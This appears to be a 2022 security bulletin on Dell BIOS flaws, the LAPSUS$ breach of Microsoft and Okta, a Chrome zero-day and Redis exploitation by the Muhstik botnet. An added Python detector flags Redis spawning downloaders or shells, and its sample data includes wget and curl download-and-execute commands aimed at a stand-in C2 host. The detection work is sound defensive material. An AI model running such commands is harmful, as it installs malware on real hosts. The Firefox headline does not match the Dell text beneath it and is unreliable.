Mozilla Firefox fixes two actively exploited zero-day bugs
Description:
Five security flaws have been disclosed in Dell BIOS. Successful exploitation of these flaws could lead to code execution on vulnerable systems. The discovered flaws are high-severity vulnerabilities rated 8.2 out of 10 on the CVSS scoring system.
All the flaws are improper input validation vulnerabilities affecting the System Management Mode (SMM) of the firmware. They allow a locally authenticated attacker to leverage a system management interrupt (SMI) to achieve arbitrary code execution.
CVE_IDs:
- CVE-2022-24415
- CVE-2022-24416
- CVE-2022-24419
- CVE-2022-24420
- CVE-2022-24421
Source:
New Dell BIOS Bugs Affect Millions of Inspiron, Vostro, XPS, Alienware Systems (thehackernews.com)
Impact:
Successful exploitation of these flaws could lead to arbitrary code execution on vulnerable systems.
Suggestions and Recommendations:
Dell has already addressed most of these vulnerabilities. It is strongly recommended to update to the latest BIOS version as soon as possible.
Microsoft and Okta Confirm Breach by LAPSUS$ Extortion Group
Description:
Microsoft confirmed that the LAPSUS$ extortion-focused hacking group had gained "limited access" to its systems, as authentication services provider Okta revealed that nearly 2.5% of its customers have been potentially impacted in the wake of the breach. According to Microsoft's Threat Intelligence Center (MSTIC), the breach was facilitated by means of a single compromised account, granting limited access.
Lapsus$ announced that it had gained access to the source code of Microsoft products such as Bing and Cortana. They leaked nearly 40 GB of files allegedly belonging to the tech giant. However, Microsoft noted that it does not rely on the secrecy of code as a security measure. The company has assured customers that the exposed code does not lead to an elevation of risk. The company also pointed out that customer code or data have not been compromised.
Identity and access management company Okta also acknowledged the breach. The breach occurred through the account of a customer support engineer working for a third-party provider. The Lapsus$ hacking group had published several screenshots to its Telegram channel purporting to show internal Okta applications, the Jira bug ticketing system, and the company's Slack. The potential impact to Okta customers is limited to the access that support engineers have.
Source:
Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability
Description:
Google has released a security update to address a high-severity vulnerability in its Chrome browser. Tracked as CVE-2022-1096, the zero-day flaw is a type confusion vulnerability in the V8 JavaScript engine.
Type confusion flaws generally lead to browser crashes following successful exploitation by reading or writing memory out of buffer bounds. Attackers can also exploit them to execute arbitrary code.
CVE_IDs:
- CVE-2022-1096
Source:
Impact:
Successful exploitation of this vulnerability can crash the browser and even lead to the execution of arbitrary code.
Suggestions and Recommendations:
The fix has been released and we strongly recommend updating to the latest version. Users of Chromium-based browsers such as Microsoft Edge and Opera are also advised to apply the fixes.
Public Redis exploit used by malware gang to grow the botnet
Description:
The Muhstik malware gang is now actively targeting and exploiting a Lua sandbox escape vulnerability in Redis after a proof-of-concept exploit was publicly released. The vulnerability is tracked as CVE-2022-0543 and affects both the Debian and Ubuntu Linux distributions.
A proof-of-concept (PoC) exploit was publicly released on GitHub, allowing malicious actors to run arbitrary Lua scripts remotely and escape the sandbox on the target host. According to a report by Juniper Threat Labs, after the PoC was released the Muhstik gang began actively exploiting the flaw to drop malware that supports its DDoS (distributed denial-of-service) operations.
CVE_IDs:
- CVE-2022-0543
Source:
Muhstik Gang targets Redis Servers | Official Juniper Networks Blogs
Impact:
Successful exploitation of CVE-2022-0543 allows a remote attacker to run commands on the affected system. Muhstik makes use of this flaw to download malware from its C2 server using wget or curl and eventually executes it.
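As an added defender-side example (not code from the bulletin, from Juniper Threat Labs or from the Redis project), the following Python flags the post-exploitation chain described above: a redis-server process spawning wget, curl or a shell. The event format and the sample lines are constructed for illustration; field names such as `parent_image`, `image` and `cmdline` are assumptions, not any particular EDR's or auditd's schema.

```python
"""Flag redis-server spawning downloaders or shells.

Added example. Input is a constructed, simplified process-execution event
stream (one JSON object per line); the field names are assumptions and
would need mapping onto whatever telemetry a real environment produces.
"""
import json
from dataclasses import dataclass
from typing import Iterable, List

# A Redis server has no legitimate reason to launch any of these.
DOWNLOADERS = {"wget", "curl"}
SHELLS = {"sh", "bash", "dash"}


@dataclass(frozen=True)
class Alert:
    host: str
    pid: int
    reason: str
    cmdline: str


def _basename(path: str) -> str:
    """Strip directories so /usr/bin/wget and /bin/wget compare equal."""
    return path.rsplit("/", 1)[-1]


def detect(events: Iterable[str]) -> List[Alert]:
    """Return one Alert per exec event whose parent is redis-server and
    whose executed image is a downloader or a shell. Malformed lines and
    non-exec events are skipped so a bad record cannot stall the pipeline."""
    alerts: List[Alert] = []
    for line in events:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if ev.get("type") != "exec":
            continue
        if _basename(ev.get("parent_image", "")) != "redis-server":
            continue
        image = _basename(ev.get("image", ""))
        if image in DOWNLOADERS:
            reason = "redis-server spawned downloader"
        elif image in SHELLS:
            reason = "redis-server spawned shell"
        else:
            continue  # e.g. redis-check-aof: a legitimate Redis child
        alerts.append(Alert(str(ev.get("host", "?")), int(ev.get("pid", -1)),
                            reason, str(ev.get("cmdline", ""))))
    return alerts


# Constructed sample telemetry: a benign Redis child, a legitimate cron
# download, the pattern from the bulletin (redis-server -> sh -> wget from a
# C2 host, then execute), a direct curl child, and a non-exec event.
SAMPLE_EVENTS = [
    '{"type":"exec","host":"db01","pid":4101,"parent_image":"/usr/bin/redis-server",'
    '"image":"/usr/bin/redis-check-aof","cmdline":"redis-check-aof --fix appendonly.aof"}',
    '{"type":"exec","host":"db01","pid":4102,"parent_image":"/usr/sbin/cron",'
    '"image":"/usr/bin/wget","cmdline":"wget -q https://updates.example.internal/feed"}',
    '{"type":"exec","host":"db01","pid":4103,"parent_image":"/usr/bin/redis-server",'
    '"image":"/bin/sh","cmdline":"sh -c \\"wget -O /tmp/x http://c2.example.invalid/x; chmod +x /tmp/x; /tmp/x\\""}',
    '{"type":"exec","host":"db01","pid":4104,"parent_image":"/usr/bin/redis-server",'
    '"image":"/usr/bin/curl","cmdline":"curl -s http://c2.example.invalid/x -o /tmp/x"}',
    '{"type":"open","host":"db01","pid":4105,"parent_image":"/usr/bin/redis-server",'
    '"image":"/usr/bin/wget","cmdline":"not an exec event"}',
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.host}] pid={a.pid} {a.reason}: {a.cmdline}")
```

The rule keys on the parent/child relationship rather than on URL or file-name indicators, so it keeps firing when the C2 address or drop path changes; conversely, the benign `redis-check-aof` child and a cron-driven wget are not flagged.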
Suggestions and Recommendations: